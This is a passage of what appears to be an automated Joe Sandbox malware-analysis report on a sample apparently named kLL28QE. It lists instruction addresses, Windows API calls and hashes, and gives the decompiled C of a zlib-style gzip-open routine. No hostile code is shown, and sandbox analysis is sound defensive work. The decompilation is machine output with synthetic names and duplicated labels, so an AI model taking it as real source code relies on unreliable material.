                                                                                                                                                                                                      0x00417372
                                                                                                                                                                                                      0x00417372
                                                                                                                                                                                                      0x00417375
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417375
                                                                                                                                                                                                      0x0041734b
                                                                                                                                                                                                      0x00417350
                                                                                                                                                                                                      0x00417352
                                                                                                                                                                                                      0x00417354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417356
                                                                                                                                                                                                      0x0041735c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041735c
                                                                                                                                                                                                      0x00417333
                                                                                                                                                                                                      0x00417333
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417117
                                                                                                                                                                                                      0x0041711a
                                                                                                                                                                                                      0x004172ec
                                                                                                                                                                                                      0x004172ec
                                                                                                                                                                                                      0x00417414
                                                                                                                                                                                                      0x00417425
                                                                                                                                                                                                      0x00417425
                                                                                                                                                                                                      0x00417120
                                                                                                                                                                                                      0x00417126
                                                                                                                                                                                                      0x0041712d
                                                                                                                                                                                                      0x0041712d
                                                                                                                                                                                                      0x00417130
                                                                                                                                                                                                      0x00417153
                                                                                                                                                                                                      0x00417155
                                                                                                                                                                                                      0x00417157
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041715d
                                                                                                                                                                                                      0x0041715d
                                                                                                                                                                                                      0x004171a2
                                                                                                                                                                                                      0x004171a2
                                                                                                                                                                                                      0x004171a5
                                                                                                                                                                                                      0x004171a8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004171c1
                                                                                                                                                                                                      0x004172aa
                                                                                                                                                                                                      0x004172ad
                                                                                                                                                                                                      0x004172b2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004172b5
                                                                                                                                                                                                      0x004171c7
                                                                                                                                                                                                      0x004171db
                                                                                                                                                                                                      0x004171dd
                                                                                                                                                                                                      0x004171e2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004171ef
                                                                                                                                                                                                      0x0041721a
                                                                                                                                                                                                      0x0041721c
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417265
                                                                                                                                                                                                      0x00417265
                                                                                                                                                                                                      0x00417267
                                                                                                                                                                                                      0x00417277
                                                                                                                                                                                                      0x0041727d
                                                                                                                                                                                                      0x0041727f
                                                                                                                                                                                                      0x00417281
                                                                                                                                                                                                      0x00417282
                                                                                                                                                                                                      0x00417283
                                                                                                                                                                                                      0x00417286
                                                                                                                                                                                                      0x0041728c
                                                                                                                                                                                                      0x0041728f
                                                                                                                                                                                                      0x00417288
                                                                                                                                                                                                      0x00417288
                                                                                                                                                                                                      0x00417289
                                                                                                                                                                                                      0x00417289
                                                                                                                                                                                                      0x004172a0
                                                                                                                                                                                                      0x004172a0
                                                                                                                                                                                                      0x004172a4
                                                                                                                                                                                                      0x004172a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417267
                                                                                                                                                                                                      0x00417222
                                                                                                                                                                                                      0x00417223
                                                                                                                                                                                                      0x00417225
                                                                                                                                                                                                      0x00417228
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041722a
                                                                                                                                                                                                      0x0041722a
                                                                                                                                                                                                      0x0041722e
                                                                                                                                                                                                      0x00417233
                                                                                                                                                                                                      0x0041724c
                                                                                                                                                                                                      0x00417252
                                                                                                                                                                                                      0x00417254
                                                                                                                                                                                                      0x00417256
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041725f
                                                                                                                                                                                                      0x00417235
                                                                                                                                                                                                      0x0041723a
                                                                                                                                                                                                      0x0041723c
                                                                                                                                                                                                      0x0041723e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417240
                                                                                                                                                                                                      0x00417246
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417246
                                                                                                                                                                                                      0x004171f4
                                                                                                                                                                                                      0x00417213
                                                                                                                                                                                                      0x00417213
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004171f4
                                                                                                                                                                                                      0x00417163
                                                                                                                                                                                                      0x00417164
                                                                                                                                                                                                      0x00417169
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041716b
                                                                                                                                                                                                      0x0041716b
                                                                                                                                                                                                      0x00417174
                                                                                                                                                                                                      0x0041718a
                                                                                                                                                                                                      0x00417190
                                                                                                                                                                                                      0x00417192
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x00417194
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x00417176
                                                                                                                                                                                                      0x0041717b
                                                                                                                                                                                                      0x0041717f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417181
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417181
                                                                                                                                                                                                      0x00417157
                                                                                                                                                                                                      0x00417109
                                                                                                                                                                                                      0x004170df
                                                                                                                                                                                                      0x004170e2
                                                                                                                                                                                                      0x004170e5
                                                                                                                                                                                                      0x004170e5
                                                                                                                                                                                                      0x004170e8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ea
                                                                                                                                                                                                      0x004170ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ef
                                                                                                                                                                                                      0x004170f7
                                                                                                                                                                                                      0x004170fb
                                                                                                                                                                                                      0x004170fd
                                                                                                                                                                                                      0x004170fd
                                                                                                                                                                                                      0x004170fe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,049B18C0), ref: 004170C5
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                                                                      				char* _t60;
                                                                                                                                                                                                      				char _t62;
                                                                                                                                                                                                      				intOrPtr _t63;
                                                                                                                                                                                                      				char _t64;
                                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                      				intOrPtr _t70;
                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                                                                      				intOrPtr* _t83;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				char* _t88;
                                                                                                                                                                                                      				char* _t89;
                                                                                                                                                                                                      				intOrPtr* _t91;
                                                                                                                                                                                                      				intOrPtr* _t93;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				signed int _t98;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t104;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                      				_t91 = __eax;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                      					_t101 = _t100 + 4;
                                                                                                                                                                                                      					if(_t93 == 0) {
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                      						 *_t93 = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                      						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                      						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                      						_t102 = _t101 + 0xc;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                      						_t87 = _t57 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t82 =  *_t57;
                                                                                                                                                                                                      							_t57 = _t57 + 1;
                                                                                                                                                                                                      						} while (_t82 != 0);
                                                                                                                                                                                                      						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                      						_t103 = _t102 + 4;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                      						if(_t60 == 0) {
                                                                                                                                                                                                      							L30:
                                                                                                                                                                                                      							E00405160(0, _t87, _t93);
                                                                                                                                                                                                      							goto L31;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                      							_t88 = _t60;
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							if( *_t91 == 0x72) {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t63 =  *_t91;
                                                                                                                                                                                                      							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t64 =  *_t91;
                                                                                                                                                                                                      							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                      								__eflags = _t64 - 0x66;
                                                                                                                                                                                                      								if(_t64 != 0x66) {
                                                                                                                                                                                                      									__eflags = _t64 - 0x68;
                                                                                                                                                                                                      									if(_t64 != 0x68) {
                                                                                                                                                                                                      										__eflags = _t64 - 0x52;
                                                                                                                                                                                                      										if(_t64 != 0x52) {
                                                                                                                                                                                                      											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                      											 *_t89 = _t64;
                                                                                                                                                                                                      											_t87 = _t89 + 1;
                                                                                                                                                                                                      											__eflags = _t87;
                                                                                                                                                                                                      											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t98 = _t64 - 0x30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t91 = _t91 + 1;
                                                                                                                                                                                                      							if(_t64 == 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 = _t103 + 0x68;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L26:
                                                                                                                                                                                                      							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                      							if(_t65 == 0) {
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(_t65 != 0x77) {
                                                                                                                                                                                                      									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                      									 *_t93 = _t66;
                                                                                                                                                                                                      									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                      									_t104 = _t103 + 0x14;
                                                                                                                                                                                                      									__eflags = _t67;
                                                                                                                                                                                                      									if(_t67 != 0) {
                                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L34;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(0x38);
                                                                                                                                                                                                      									_push("1.2.3");
                                                                                                                                                                                                      									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                      									_push(8);
                                                                                                                                                                                                      									_push(0xfffffff1);
                                                                                                                                                                                                      									_push(8);
                                                                                                                                                                                                      									_push(_t98);
                                                                                                                                                                                                      									_push(_t93);
                                                                                                                                                                                                      									_t91 = E00404CE0();
                                                                                                                                                                                                      									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                      									_t104 = _t103 + 0x24;
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                      									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                      										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                      										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										_push(_t104 + 0x18);
                                                                                                                                                                                                      										if(__eflags >= 0) {
                                                                                                                                                                                                      											_push(_t69);
                                                                                                                                                                                                      											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                      											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                      											_t70 = E0040CB9D();
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                      										__eflags = _t70;
                                                                                                                                                                                                      										if(_t70 == 0) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                      											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                      												E00405000(_t93, 0);
                                                                                                                                                                                                      												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                      												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                      												__eflags = _t74;
                                                                                                                                                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                      												return _t93;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                      												return _t93;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L42;
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t62 =  *_t83;
                                                                                                                                                                                                      							 *_t88 = _t62;
                                                                                                                                                                                                      							_t83 = _t83 + 1;
                                                                                                                                                                                                      							_t88 = _t88 + 1;
                                                                                                                                                                                                      							if(_t62 != 0) {
                                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L42:
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x004057b7
                                                                                                                                                                                                      0x004057bf
                                                                                                                                                                                                      0x004057c3
                                                                                                                                                                                                      0x004057c5
                                                                                                                                                                                                      0x004057cd
                                                                                                                                                                                                      0x004059c8
                                                                                                                                                                                                      0x004059ce
                                                                                                                                                                                                      0x004057db
                                                                                                                                                                                                      0x004057e3
                                                                                                                                                                                                      0x004057e5
                                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                                      0x00405921
                                                                                                                                                                                                      0x0040592a
                                                                                                                                                                                                      0x004057f0
                                                                                                                                                                                                      0x004057f3
                                                                                                                                                                                                      0x004057f6
                                                                                                                                                                                                      0x004057f9
                                                                                                                                                                                                      0x004057fc
                                                                                                                                                                                                      0x004057ff
                                                                                                                                                                                                      0x00405801
                                                                                                                                                                                                      0x00405804
                                                                                                                                                                                                      0x00405807
                                                                                                                                                                                                      0x0040580a
                                                                                                                                                                                                      0x0040580d
                                                                                                                                                                                                      0x00405810
                                                                                                                                                                                                      0x00405813
                                                                                                                                                                                                      0x00405816
                                                                                                                                                                                                      0x00405819
                                                                                                                                                                                                      0x0040581c
                                                                                                                                                                                                      0x00405824
                                                                                                                                                                                                      0x00405827
                                                                                                                                                                                                      0x0040582b
                                                                                                                                                                                                      0x0040582e
                                                                                                                                                                                                      0x00405831
                                                                                                                                                                                                      0x00405834
                                                                                                                                                                                                      0x00405837
                                                                                                                                                                                                      0x00405837
                                                                                                                                                                                                      0x00405839
                                                                                                                                                                                                      0x0040583a
                                                                                                                                                                                                      0x00405842
                                                                                                                                                                                                      0x00405847
                                                                                                                                                                                                      0x0040584a
                                                                                                                                                                                                      0x0040584f
                                                                                                                                                                                                      0x0040591c
                                                                                                                                                                                                      0x0040591c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405855
                                                                                                                                                                                                      0x00405855
                                                                                                                                                                                                      0x00405859
                                                                                                                                                                                                      0x0040585b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405870
                                                                                                                                                                                                      0x00405872
                                                                                                                                                                                                      0x00405874
                                                                                                                                                                                                      0x00405874
                                                                                                                                                                                                      0x00405877
                                                                                                                                                                                                      0x0040587b
                                                                                                                                                                                                      0x00405881
                                                                                                                                                                                                      0x00405881
                                                                                                                                                                                                      0x00405885
                                                                                                                                                                                                      0x00405889
                                                                                                                                                                                                      0x00405897
                                                                                                                                                                                                      0x00405899
                                                                                                                                                                                                      0x004058a5
                                                                                                                                                                                                      0x004058a7
                                                                                                                                                                                                      0x004058b3
                                                                                                                                                                                                      0x004058b5
                                                                                                                                                                                                      0x004058c1
                                                                                                                                                                                                      0x004058c5
                                                                                                                                                                                                      0x004058c7
                                                                                                                                                                                                      0x004058c7
                                                                                                                                                                                                      0x004058c8
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040588f
                                                                                                                                                                                                      0x00405892
                                                                                                                                                                                                      0x00405892
                                                                                                                                                                                                      0x004058cc
                                                                                                                                                                                                      0x004058cf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058d1
                                                                                                                                                                                                      0x004058d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058db
                                                                                                                                                                                                      0x004058db
                                                                                                                                                                                                      0x004058e0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058e2
                                                                                                                                                                                                      0x004058e4
                                                                                                                                                                                                      0x00405930
                                                                                                                                                                                                      0x0040593f
                                                                                                                                                                                                      0x00405942
                                                                                                                                                                                                      0x00405944
                                                                                                                                                                                                      0x00405949
                                                                                                                                                                                                      0x0040594c
                                                                                                                                                                                                      0x0040594e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405950
                                                                                                                                                                                                      0x00405950
                                                                                                                                                                                                      0x00405953
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405953
                                                                                                                                                                                                      0x004058e6
                                                                                                                                                                                                      0x004058ea
                                                                                                                                                                                                      0x004058ec
                                                                                                                                                                                                      0x004058f1
                                                                                                                                                                                                      0x004058f2
                                                                                                                                                                                                      0x004058f4
                                                                                                                                                                                                      0x004058f6
                                                                                                                                                                                                      0x004058f8
                                                                                                                                                                                                      0x004058f9
                                                                                                                                                                                                      0x00405904
                                                                                                                                                                                                      0x00405906
                                                                                                                                                                                                      0x0040590b
                                                                                                                                                                                                      0x0040590e
                                                                                                                                                                                                      0x00405911
                                                                                                                                                                                                      0x00405916
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405961
                                                                                                                                                                                                      0x00405963
                                                                                                                                                                                                      0x00405967
                                                                                                                                                                                                      0x0040596d
                                                                                                                                                                                                      0x0040596e
                                                                                                                                                                                                      0x0040597c
                                                                                                                                                                                                      0x0040597d
                                                                                                                                                                                                      0x00405970
                                                                                                                                                                                                      0x00405970
                                                                                                                                                                                                      0x00405974
                                                                                                                                                                                                      0x00405975
                                                                                                                                                                                                      0x00405975
                                                                                                                                                                                                      0x00405985
                                                                                                                                                                                                      0x00405988
                                                                                                                                                                                                      0x0040598a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040598c
                                                                                                                                                                                                      0x0040598c
                                                                                                                                                                                                      0x00405990
                                                                                                                                                                                                      0x004059a5
                                                                                                                                                                                                      0x004059ad
                                                                                                                                                                                                      0x004059b6
                                                                                                                                                                                                      0x004059b6
                                                                                                                                                                                                      0x004059b9
                                                                                                                                                                                                      0x004059c5
                                                                                                                                                                                                      0x00405992
                                                                                                                                                                                                      0x00405992
                                                                                                                                                                                                      0x004059a2
                                                                                                                                                                                                      0x004059a2
                                                                                                                                                                                                      0x00405990
                                                                                                                                                                                                      0x0040598a
                                                                                                                                                                                                      0x00405916
                                                                                                                                                                                                      0x004058e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405860
                                                                                                                                                                                                      0x00405860
                                                                                                                                                                                                      0x00405862
                                                                                                                                                                                                      0x00405864
                                                                                                                                                                                                      0x00405865
                                                                                                                                                                                                      0x00405868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040586a
                                                                                                                                                                                                      0x0040586a
                                                                                                                                                                                                      0x0040586d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405868
